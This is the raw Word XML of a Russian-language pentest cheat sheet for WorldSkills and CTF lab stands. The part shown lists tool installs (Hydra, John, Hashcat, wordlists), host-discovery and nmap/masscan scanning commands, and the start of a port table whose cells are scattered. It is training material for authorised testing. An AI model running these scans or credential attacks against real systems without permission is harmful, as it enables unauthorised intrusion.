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WORLDskills / Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="42"/>
        </w:rPr>
        <w:t>PENTEST CHEAT SHEET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ALT Linux 11 K + Kali Linux (VirtualBox)</w:t>
        <w:br/>
        <w:t>Расширенная турнирная шпаргалка с пояснениями команд и вариантами использования</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Оглавление</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr="TOC \o &quot;1-3&quot; \h \z \u"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Если оглавление не обновилось автоматически, обновите поле/оглавление в LibreOffice или Word.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>0. Правила применения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Команды ниже предназначены для WorldSkills, CTF и разрешённых учебных стендов. TARGET, SUBNET, LHOST и DOMAIN — переменные, которые заменяются данными задания.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Сначала reconnaissance и enumeration, потом brute-force.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Сохраняй результаты сканов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>После получения доступа повторяй enumeration изнутри.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>При дефиците времени переходи к следующей цели вместо зацикливания на одной гипотезе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Переменные турнира</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>export TARGET="192.168.56.10"       # IP цели</w:t>
        <w:br/>
        <w:t>export SUBNET="192.168.56.0/24"     # сеть стенда</w:t>
        <w:br/>
        <w:t>export LHOST="192.168.56.20"        # IP Kali</w:t>
        <w:br/>
        <w:t>export DOMAIN="example.local"       # FQDN из задания</w:t>
        <w:br/>
        <w:br/>
        <w:t>mkdir -p ~/WS-PENTEST/{recon,scans,web,loot,hashes,exploits,notes,loot/creds}</w:t>
        <w:br/>
        <w:t>cd ~/WS-PENTEST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Меняй значения в этом блоке один раз, а дальше используй переменные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. ALT Linux 11 K + Kali в VirtualBox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</w:tcPr>
          <w:p>
            <w:r>
              <w:t>Компонент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Роль</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Практика</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ALT Linux 11 K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Основная ОС</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Burp Suite, браузер, SSH-клиент, заметки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Пентест</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Nmap, ffuf, Gobuster, Hydra, John/Hashcat, Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Изоляция</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Сеть согласно условиям стенда</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Проверка сети</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ip -br a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Коротко показывает интерфейсы и IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>ip a — полный вывод.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ip route</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Показывает маршруты и default gateway.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>ip route get TARGET — конкретный маршрут.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ip neigh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Показывает ARP/NDP-соседей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>sudo arp-scan --localnet — активное обнаружение.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ping -c 3 TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяет ICMP-доступность.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Если ICMP фильтруется — nmap -Pn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Подготовка Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt update</w:t>
        <w:br/>
        <w:t>sudo apt full-upgrade -y</w:t>
        <w:br/>
        <w:t>sudo apt install -y nmap masscan arp-scan netdiscover dnsutils whois curl wget git jq tmux vim nano netcat-openbsd socat python3 python3-pip ffuf gobuster feroxbuster nikto whatweb hydra medusa john hashcat hashid seclists wordlists smbclient smbmap enum4linux-ng ldap-utils snmp onesixtyone ftp ssh sshpass</w:t>
        <w:br/>
        <w:t>sudo gzip -dk /usr/share/wordlists/rockyou.txt.gz 2&gt;/dev/null || true</w:t>
        <w:br/>
        <w:br/>
        <w:t>ls -lh /usr/share/wordlists/</w:t>
        <w:br/>
        <w:t>ls -lh /usr/share/seclists/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Если пакет уже установлен, apt обычно не ломает систему: он сообщает, что пакет уже последней версии. Ошибки конкретного пакета проверяй отдельно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. tmux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>tmux new -s ws</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Создаёт устойчивую терминальную сессию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>tmux attach -t ws — вернуться; tmux ls — список.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Ctrl+B C  # новое окно</w:t>
        <w:br/>
        <w:t>Ctrl+B N  # следующее окно</w:t>
        <w:br/>
        <w:t>Ctrl+B P  # предыдущее</w:t>
        <w:br/>
        <w:t>Ctrl+B D  # отсоединиться</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Recon / Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Поиск хостов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -sn $SUBNET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>ARP/ICMP discovery без порт-сканирования.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>nmap -sn 192.168.1.0/24 -oA scans/hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo arp-scan --localnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Ищет устройства через ARP в локальном сегменте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>sudo arp-scan -I eth0 --localnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo netdiscover -r $SUBNET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Интерактивно показывает ARP-хосты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Удобно для быстрого обзора.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo masscan $SUBNET -p1-65535 --rate 2000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Очень быстро ищет открытые TCP-порты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>На слабом стенде снижай --rate; найденные порты подтверждай Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Быстрый скан популярных TCP-портов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>-Pn — пропустить discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sV $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет версии сервисов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>--version-light быстрее; --version-all глубже.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sC -sV $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Стандартные NSE + версии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Хороший основной быстрый скан.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -p- -sV $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Сканирует все TCP-порты и определяет сервисы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Дольше, но важен для нестандартных портов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -sU --top-ports 100 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяет популярные UDP-порты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Расширяй top-ports при наличии времени.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -A $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Комплексное определение ОС/версий/NSE/traceroute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Используй после первичного discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -p22,21,23,25,53,80,139,443,445,389,636,3306,3389,5432,8080 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Быстрая проверка типовых сервисов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Добавляй найденные нестандартные порты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -sC -sV -p- $TARGET -oA scans/$TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Полный TCP-скан с сохранением результатов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Получаешь .nmap/.xml/.gnmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>sudo nmap -Pn -p- --min-rate 1000 $TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Полный скан без host discovery с ускорением.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Не завышай rate на нестабильном стенде.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Порты и первый шаг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</w:tcPr>
          <w:p>
            <w:r>
              <w:t>Порт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Сервис</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Что делать</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>anonymous, banner, версия</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>версия, ключи, найденные credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
